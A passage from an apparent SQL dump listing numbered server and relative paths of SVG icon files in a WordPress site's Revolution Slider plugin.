.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_hide_24px.svg'),(3041,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_return_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_return_24px.svg'),(3042,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_tab_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_tab_24px.svg'),(3043,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_voice_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_keyboard_voice_24px.svg'),(3044,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_24px.svg'),(3045,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_chromebook_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_chromebook_24px.svg'),(3046,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_mac_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_mac_24px.svg'),(3047,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_windows_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_laptop_windows_24px.svg'),(3048,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_memory_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_memory_24px.svg'),(3049,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_mouse_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_mouse_24px.svg'),(3050,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phone_android_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phone_android_24px.svg'),(3051,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phone_iphone_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phone_iphone_24px.svg'),(3052,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phonelink_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phonelink_24px.svg'),(3053,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phonelink_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_phonelink_off_24px.svg'),(3054,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_power_input_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_power_input_24px.svg'),(3055,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_router_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_router_24px.svg'),(3056,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_scanner_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_scanner_24px.svg'),(3057,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_security_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_security_24px.svg'),(3058,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_sim_card_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_sim_card_24px.svg'),(3059,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_smartphone_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_smartphone_24px.svg'),(3060,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_speaker_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_speaker_24px.svg'),(3061,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_speaker_group_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_speaker_group_24px.svg'),(3062,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_24px.svg'),(3063,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_android_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_android_24px.svg'),(3064,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_mac_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tablet_mac_24px.svg'),(3065,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_toys_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_toys_24px.svg'),(3066,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tv_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_tv_24px.svg'),(3067,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_videogame_asset_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_videogame_asset_24px.svg'),(3068,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_watch_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/hardware/ic_watch_24px.svg'),(3069,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_add_a_photo_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_add_a_photo_24px.svg'),(3070,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_add_to_photos_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_add_to_photos_24px.svg'),(3071,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_adjust_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_adjust_24px.svg'),(3072,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_assistant_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_assistant_24px.svg'),(3073,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_assistant_photo_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_assistant_photo_24px.svg'),(3074,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_audiotrack_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_audiotrack_24px.svg'),(3075,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_circular_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_circular_24px.svg'),(3076,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_linear_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_linear_24px.svg'),(3077,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_off_24px.svg'),(3078,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_on_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_blur_on_24px.svg'),(3079,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_1_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_1_24px.svg'),(3080,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_2_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_2_24px.svg'),(3081,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_3_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_3_24px.svg'),(3082,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_4_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_4_24px.svg'),(3083,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_5_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_5_24px.svg'),(3084,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_6_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_6_24px.svg'),(3085,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_7_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brightness_7_24px.svg'),(3086,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_broken_image_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_broken_image_24px.svg'),(3087,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brush_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_brush_24px.svg'),(3088,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_24px.svg'),(3089,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_alt_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_alt_24px.svg'),(3090,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_front_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_front_24px.svg'),(3091,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_rear_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_rear_24px.svg'),(3092,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_roll_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_camera_roll_24px.svg'),(3093,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_center_focus_strong_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_center_focus_strong_24px.svg'),(3094,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_center_focus_weak_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_center_focus_weak_24px.svg'),(3095,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_collections_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_collections_24px.svg'),(3096,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_collections_bookmark_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_collections_bookmark_24px.svg'),(3097,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_color_lens_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_color_lens_24px.svg'),(3098,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_colorize_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_colorize_24px.svg'),(3099,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_compare_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_compare_24px.svg'),(3100,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_control_point_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_control_point_24px.svg'),(3101,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_control_point_duplicate_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_control_point_duplicate_24px.svg'),(3102,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_16_9_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_16_9_24px.svg'),(3103,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_24px.svg'),(3104,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_3_2_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_3_2_24px.svg'),(3105,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_5_4_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_5_4_24px.svg'),(3106,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_7_5_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_7_5_24px.svg'),(3107,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_din_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_din_24px.svg'),(3108,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_free_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_free_24px.svg'),(3109,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_landscape_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_landscape_24px.svg'),(3110,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_original_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_original_24px.svg'),(3111,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_portrait_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_portrait_24px.svg'),(3112,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_rotate_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_rotate_24px.svg'),(3113,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_square_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_crop_square_24px.svg'),(3114,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_dehaze_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_dehaze_24px.svg'),(3115,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_details_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_details_24px.svg'),(3116,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_edit_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_edit_24px.svg'),(3117,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_24px.svg'),(3118,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_neg_1_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_neg_1_24px.svg'),(3119,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_neg_2_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_neg_2_24px.svg'),(3120,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_plus_1_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_plus_1_24px.svg'),(3121,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_plus_2_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_plus_2_24px.svg'),(3122,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_zero_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_exposure_zero_24px.svg'),(3123,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_1_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_1_24px.svg'),(3124,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_24px.svg'),(3125,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_2_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_2_24px.svg'),(3126,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_3_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_3_24px.svg'),(3127,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_4_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_4_24px.svg'),(3128,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_5_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_5_24px.svg'),(3129,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_6_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_6_24px.svg'),(3130,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_7_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_7_24px.svg'),(3131,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_8_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_8_24px.svg'),(3132,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_9_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_9_24px.svg'),(3133,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_9_plus_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_9_plus_24px.svg'),(3134,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_b_and_w_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_b_and_w_24px.svg'),(3135,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_center_focus_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_center_focus_24px.svg'),(3136,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_drama_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_drama_24px.svg'),(3137,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_frames_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_frames_24px.svg'),(3138,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_hdr_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_hdr_24px.svg'),(3139,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_none_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_none_24px.svg'),(3140,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_tilt_shift_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_tilt_shift_24px.svg'),(3141,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_vintage_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_filter_vintage_24px.svg'),(3142,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flare_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flare_24px.svg'),(3143,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flash_auto_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flash_auto_24px.svg'),(3144,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flash_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flash_off_24px.svg'),(3145,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flash_on_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flash_on_24px.svg'),(3146,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flip_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_flip_24px.svg'),(3147,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_gradient_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_gradient_24px.svg'),(3148,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grain_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grain_24px.svg'),(3149,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grid_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grid_off_24px.svg'),(3150,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grid_on_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_grid_on_24px.svg'),(3151,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_off_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_off_24px.svg'),(3152,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_on_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_on_24px.svg'),(3153,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_strong_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_strong_24px.svg'),(3154,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_weak_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_hdr_weak_24px.svg'),(3155,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_healing_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_healing_24px.svg'),(3156,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_image_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_image_24px.svg'),(3157,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_image_aspect_ratio_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_image_aspect_ratio_24px.svg'),(3158,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_iso_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_iso_24px.svg'),(3159,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_landscape_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_landscape_24px.svg'),(3160,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_leak_add_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_leak_add_24px.svg'),(3161,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_leak_remove_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_leak_remove_24px.svg'),(3162,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_lens_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_lens_24px.svg'),(3163,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_linked_camera_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_linked_camera_24px.svg'),(3164,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_24px.svg'),(3165,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_3_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_3_24px.svg'),(3166,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_4_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_4_24px.svg'),(3167,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_5_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_5_24px.svg'),(3168,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_6_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_6_24px.svg'),(3169,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_one_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_one_24px.svg'),(3170,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_two_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_looks_two_24px.svg'),(3171,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_loupe_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_loupe_24px.svg'),(3172,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_monochrome_photos_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_monochrome_photos_24px.svg'),(3173,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_movie_creation_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_movie_creation_24px.svg'),(3174,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_movie_filter_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_movie_filter_24px.svg'),(3175,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_music_note_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_music_note_24px.svg'),(3176,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_nature_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_nature_24px.svg'),(3177,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_nature_people_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_nature_people_24px.svg'),(3178,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_navigate_before_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_navigate_before_24px.svg'),(3179,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_navigate_next_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_navigate_next_24px.svg'),(3180,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/revslider/public/assets/assets/svg/image/ic_palette_24px.svg','wp-content/plugins/revslider/public/assets/assets/svg/image/ic_palette_24px.svg'),(3181,'/home/